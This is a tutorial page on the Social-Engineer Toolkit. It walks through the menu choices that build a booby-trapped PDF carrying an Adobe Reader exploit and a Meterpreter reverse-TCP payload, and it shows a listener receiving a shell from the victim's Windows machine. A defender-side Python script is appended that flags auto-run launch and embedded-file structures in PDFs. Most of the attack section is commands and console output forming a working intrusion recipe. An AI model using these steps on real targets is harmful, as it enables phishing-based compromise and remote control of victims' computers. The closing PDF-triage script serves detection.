SEToolkit

Description

SEToolkit, the Social-Engineer Toolkit (SET), is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly become a standard tool in a penetration tester's arsenal. SET was written by David Kennedy (ReL1K) and, with a lot of help from the community, has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization, used during a penetration test.

Example
Reverse Connection Using SET From A PDF

In this session the listener address (lhost) is 192.168.1.8 and the listener port (lport) is 4444.

                 .--.  .--. .-----.
                : .--': .--'`-. .-'
                `. `. : `;    : :
                 _`, :: :__   : :
                `.__.'`.__.'  :_;   

[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
[---]                Version: 6.0.5                    [---]
[---]             Codename: 'Rebellion'                [---]
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]

        Welcome to the Social-Engineer Toolkit (SET). 
         The one stop shop for all of your SE needs.

     Join us on irc.freenode.net in channel #setoolkit

   The Social-Engineer Toolkit is a product of TrustedSec.

             Visit: https://www.trustedsec.com

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) Third Party Modules

  99) Return back to the main menu.

set> 3

 The Infectious USB/CD/DVD module will create an autorun.inf file and a
 Metasploit payload. When the DVD/USB/CD is inserted, it will automatically
 run if autorun is enabled.

 Pick the attack vector you wish to use: fileformat bugs or a straight executable.

   1) File-Format Exploits
   2) Standard Metasploit Executable

  99) Return to Main Menu

set:infectious>1
set:infectious> IP address for the reverse connection (payload):192.168.1.8

 Select the file format exploit you want.
 The default is the PDF embedded EXE.

           ********** PAYLOADS **********

   1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
   2) SET Custom Written Document UNC LM SMB Capture Attack
   3) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
   4) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
   5) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
   6) Adobe Flash Player "Button" Remote Code Execution
   7) Adobe CoolType SING Table "uniqueName" Overflow
   8) Adobe Flash Player "newfunction" Invalid Pointer Use
   9) Adobe Collab.collectEmailInfo Buffer Overflow
  10) Adobe Collab.getIcon Buffer Overflow
  11) Adobe JBIG2Decode Memory Corruption Exploit
  12) Adobe PDF Embedded EXE Social Engineering
  13) Adobe util.printf() Buffer Overflow
  14) Custom EXE to VBA (sent via RAR) (RAR required)
  15) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
  16) Adobe PDF Embedded EXE Social Engineering (NOJS)
  17) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
  18) Apple QuickTime PICT PnSize Buffer Overflow
  19) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
  20) Adobe Reader u3D Memory Corruption Vulnerability
  21) MSCOMCTL ActiveX Buffer Overflow (ms12-027)

set:payloads>20



   1) Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker
   2) Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker
   4) Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
   5) Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
   6) Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system
   7) Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter

set:payloads>2
set> IP address for the payload listener: 192.168.1.8
set:payloads> Port to connect back on [443]:4444
[-] Generating fileformat exploit...
[*] Payload creation complete.
[*] All payloads get sent to the /home/cyborg/.set/template.pdf directory
[*] Your attack has been created in the SET home directory folder 'autorun'
[*] Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.
[-] Copy the contents of the folder to a CD/DVD/USB to autorun
set> Create a listener right now [yes|no]: yes

Now send template.pdf to the victim. The listener output below shows what happens once it is opened:

 ______________________________________________________________________________
|                                                                              |
|                   METASPLOIT CYBER MISSILE COMMAND V4                        |
|______________________________________________________________________________|
      \                                  /                      /
       \     .                          /                      /            x
        \                              /                      /
         \                            /          +           /
          \            +             /                      /
           *                        /                      /
                                   /      .               /
    X                             /                      /            X
                                 /                     ###
                                /                     # % #
                               /                       ###
                      .       /
     .                       /      .            *           .
                            /
                           *
                  +                       *

                                       ^
####      __     __     __          #######         __     __     __        ####
####    /    \ /    \ /    \      ###########     /    \ /    \ /    \      ####
################################################################################
################################################################################
# WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
                                                           http://metasploit.pro


Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.10.0-2014082003 [core:4.10.0.pre.2014082003 api:1.0.0]]
+ -- --=[ 1331 exploits - 721 auxiliary - 214 post        ]
+ -- --=[ 340 payloads - 35 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing /home/cyborg/.set/meta_config for ERB directives.
resource (/home/cyborg/.set/meta_config)> use multi/handler
resource (/home/cyborg/.set/meta_config)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/home/cyborg/.set/meta_config)> set lhost 192.168.1.8
lhost => 192.168.1.8
resource (/home/cyborg/.set/meta_config)> set lport 4444
lport => 4444
resource (/home/cyborg/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/home/cyborg/.set/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) > 
[*] Started reverse handler on 192.168.1.8:4444 
[*] Starting the payload handler...
[*] Sending stage (769536 bytes) to 192.168.1.40
[*] Meterpreter session 1 opened (192.168.1.8:4444 -> 192.168.1.40:51775) at 2015-10-12 12:57:58 +0530
meterpreter > pwd
C:\Users\ztrela\Downloads
meterpreter > execute -f cmd.exe -i -H
Process 2148 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\ztrela\Downloads
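The session above ends with a Meterpreter shell obtained from a single opened PDF. As an added, defender-side example (not code from the page, SET or Metasploit), the script below triages a PDF for the structures an embedded-EXE / launch-action document depends on (an auto-run action such as /OpenAction or /AA combined with /Launch, /EmbeddedFile or JavaScript). Which of these the SET-generated template.pdf actually contains is an assumption here; the sample PDF is constructed, and hex-escaped names (e.g. /#4Caunch) are normalized so simple obfuscation does not hide the keyword.

```python
import re
from collections import Counter

# PDF structures the embedded-EXE / launch-action technique relies on. Whether the
# SET-generated template.pdf contains exactly these is an assumption, not stated on the page.
SUSPICIOUS_NAMES = {
    "/OpenAction": "action runs automatically when the document is opened",
    "/AA": "additional event-triggered actions",
    "/Launch": "launches an external program or file",
    "/EmbeddedFile": "carries an embedded file stream (e.g. an executable)",
    "/JavaScript": "contains JavaScript",
    "/JS": "contains JavaScript",
}
TRIGGERS = {"/OpenAction", "/AA"}
PAYLOADS = {"/Launch", "/EmbeddedFile", "/JavaScript", "/JS"}

_NAME_RE = re.compile(rb"/[^\s/<>\[\]()]+")   # one PDF name token
_HEX_RE = re.compile(rb"#([0-9A-Fa-f]{2})")  # #xx escape inside a name

def normalize_name(raw: bytes) -> str:
    """Decode PDF name escapes so an obfuscated /#4Caunch still matches /Launch."""
    return _HEX_RE.sub(lambda m: bytes([int(m.group(1), 16)]), raw).decode("latin-1")

def scan_pdf(data: bytes) -> dict:
    """Count suspicious name tokens in raw PDF bytes and rate the combination found."""
    counts = Counter(normalize_name(m.group(0)) for m in _NAME_RE.finditer(data))
    found = {n: c for n, c in counts.items() if n in SUSPICIOUS_NAMES}
    names = set(found)
    if names & TRIGGERS and names & PAYLOADS:
        verdict = "high"      # something auto-triggers, and there is something for it to run
    elif names:
        verdict = "medium"    # a risky feature is present but nothing auto-triggers it
    else:
        verdict = "none"
    return {"findings": found, "verdict": verdict,
            "reasons": [SUSPICIOUS_NAMES[n] for n in sorted(names)]}

# Constructed samples (not real SET output): the first auto-runs a hex-escaped Launch action
# and embeds a file; the second is a plain one-page document.
SAMPLE_PDF = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
              b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
              b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
              b"4 0 obj << /Type /Action /S /#4Caunch /F (payload.exe) >> endobj\n"
              b"5 0 obj << /Type /Filespec /F (payload.exe) /EF << /F 6 0 R >> >> endobj\n"
              b"6 0 obj << /Type /EmbeddedFile /Length 2 >> stream\nMZ\nendstream endobj\n"
              b"trailer << /Root 1 0 R >>\n%%EOF\n")
BENIGN_PDF = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
              b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
              b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\ntrailer << /Root 1 0 R >>\n%%EOF\n")

if __name__ == "__main__":
    for label, doc in (("sample", SAMPLE_PDF), ("benign", BENIGN_PDF)):
        print(label, scan_pdf(doc))
```

This looks only at uncompressed tokens; a real triage pass must also inflate FlateDecode streams and object streams, where these names are commonly hidden.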
©2017 Ztrela Knowledge Solutions Pvt. Ltd